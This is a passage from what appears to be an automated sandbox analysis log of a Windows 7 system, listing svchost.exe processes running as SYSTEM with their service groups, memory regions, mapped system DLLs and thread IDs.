"c:\\windows\\system32\\imageres.dll") Region: id = 38425 start_va = 0x2970000 end_va = 0x2970fff entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 38426 start_va = 0x2d00000 end_va = 0x2d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 38427 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Thread: id = 1129 os_tid = 0x300 Thread: id = 1130 os_tid = 0x308 Thread: id = 1131 os_tid = 0x30c Thread: id = 1133 os_tid = 0x310 Thread: id = 1134 os_tid = 0x314 Thread: id = 1135 os_tid = 0x318 Thread: id = 1137 os_tid = 0x320 Thread: id = 1138 os_tid = 0x324 Thread: id = 1139 os_tid = 0x328 Thread: id = 1199 os_tid = 0x428 Process: id = "674" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d11a0" os_pid = "0x32c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b80a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 37752 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37753 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 37754 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 37755 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 37756 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37757 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37758 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37759 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37760 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37761 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 37771 start_va = 0x1d0000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 37772 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37773 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37774 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37775 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37776 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37777 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37778 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37779 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37780 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37781 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37782 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37783 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37784 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37785 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37786 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 37787 start_va = 0x1d0000 end_va = 0x1ecfff entry_point = 0x1d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37788 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 37789 start_va = 0x1d0000 end_va = 0x1ecfff entry_point = 0x1d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37790 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37791 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37792 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 37793 start_va = 0x380000 end_va = 0x480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 37794 start_va = 0x250000 end_va = 0x256fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 37795 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 37796 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 37797 start_va = 0x490000 end_va = 0x882fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 37798 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 37799 start_va = 0x8a0000 end_va = 0x8fbfff entry_point = 0x8a0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37800 start_va = 0x8a0000 end_va = 0x8fbfff entry_point = 0x8a0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37801 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37811 start_va = 0xa20000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 37812 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37813 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37832 start_va = 0x980000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 37833 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37838 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 37839 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37842 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 37843 start_va = 0xc30000 end_va = 0xefefff entry_point = 0xc30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37844 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37845 start_va = 0x74250000 end_va = 0x742c9fff entry_point = 0x74250000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 37846 start_va = 0x74220000 end_va = 0x74244fff entry_point = 0x74220000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37847 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37848 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37849 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37850 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37851 start_va = 0x74770000 end_va = 0x747a8fff entry_point = 0x74770000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 37852 start_va = 0x74ac0000 end_va = 0x74bb4fff entry_point = 0x74ac0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 37853 start_va = 0x74210000 end_va = 0x74216fff entry_point = 0x74210000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 37898 start_va = 0x8a0000 end_va = 0x8a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 37899 start_va = 0x8c0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 37900 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37901 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 37902 start_va = 0x8b0000 end_va = 0x8b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 37903 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 37904 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37908 start_va = 0x900000 end_va = 0x900fff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 37909 start_va = 0x910000 end_va = 0x910fff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 37910 start_va = 0x771b0000 end_va = 0x77206fff entry_point = 0x771b0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 37915 start_va = 0xa60000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 37916 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37921 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 37922 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37923 start_va = 0x920000 end_va = 0x920fff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 37924 start_va = 0x920000 end_va = 0x920fff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 37925 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 37926 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 38027 start_va = 0x9c0000 end_va = 0x9fffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 38028 start_va = 0x74160000 end_va = 0x741e7fff entry_point = 0x74160000 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 38029 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38030 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 38031 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 38032 start_va = 0x752b0000 end_va = 0x752bafff entry_point = 0x752b0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 38033 start_va = 0x74130000 end_va = 0x74154fff entry_point = 0x74130000 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 38034 start_va = 0x758b0000 end_va = 0x758cafff entry_point = 0x758b0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 38037 start_va = 0x1090000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 38038 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 38061 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 38062 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 38063 start_va = 0x73fb0000 end_va = 0x7402cfff entry_point = 0x73fb0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 38064 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 38065 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 38066 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 38067 start_va = 0x10d0000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 38068 start_va = 0x73f70000 end_va = 0x73fa4fff entry_point = 0x73f70000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 38079 start_va = 0x8c0000 end_va = 0x8c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 38080 start_va = 0x74c00000 end_va = 0x74d9dfff entry_point = 0x74c00000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 38081 start_va = 0x8d0000 end_va = 0x8d0fff entry_point = 0x8d0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 38084 start_va = 0x8e0000 end_va = 0x8e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 38085 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38086 start_va = 0x920000 end_va = 0x95bfff entry_point = 0x920000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38087 start_va = 0x920000 end_va = 0x95bfff entry_point = 0x920000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38088 start_va = 0x920000 end_va = 0x95bfff entry_point = 0x920000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38089 start_va = 0x920000 end_va = 0x95bfff entry_point = 0x920000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38090 start_va = 0x920000 end_va = 0x95bfff entry_point = 0x920000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38091 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38092 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 38128 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 38129 start_va = 0x11e0000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 38130 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 38131 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 38132 start_va = 0x74600000 end_va = 0x7460cfff entry_point = 0x74600000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 38133 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 38134 start_va = 0x752e0000 end_va = 0x752f5fff entry_point = 0x752e0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 38170 start_va = 0x1010000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 38171 start_va = 0x1290000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 38172 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 38173 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 38811 start_va = 0x1320000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 38812 start_va = 0x71210000 end_va = 0x7121afff entry_point = 0x71210000 region_type = mapped_file name = "uxsms.dll" filename = "\\Windows\\System32\\uxsms.dll" (normalized: "c:\\windows\\system32\\uxsms.dll") Region: id = 38813 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 38814 start_va = 0x13b0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 38815 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Thread: id = 1141 os_tid = 0x330 Thread: id = 1142 os_tid = 0x338 Thread: id = 1147 os_tid = 0x34c Thread: id = 1149 os_tid = 0x354 Thread: id = 1150 os_tid = 0x358 Thread: id = 1152 os_tid = 0x364 Thread: id = 1154 os_tid = 0x36c Thread: id = 1155 os_tid = 0x370 Thread: id = 1159 os_tid = 0x380 Thread: id = 1160 os_tid = 0x384 Thread: id = 1172 os_tid = 0x3b8 Thread: id = 1173 os_tid = 0x3bc Thread: id = 1178 os_tid = 0x3d0 Thread: id = 1179 os_tid = 0x3d4 Thread: id = 1181 os_tid = 0x3dc Thread: id = 1182 os_tid = 0x3e0 Thread: id = 1188 os_tid = 0x3fc Thread: id = 1189 os_tid = 0x400 Thread: id = 1225 os_tid = 0x49c Thread: id = 1226 os_tid = 0x4a0 Process: id = "675" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d11c0" os_pid = "0x35c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c468" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 37854 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37855 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 37856 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 37857 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 37858 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37859 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37860 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37861 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37862 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37863 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 37866 start_va = 0x90000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 37867 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37868 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37869 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 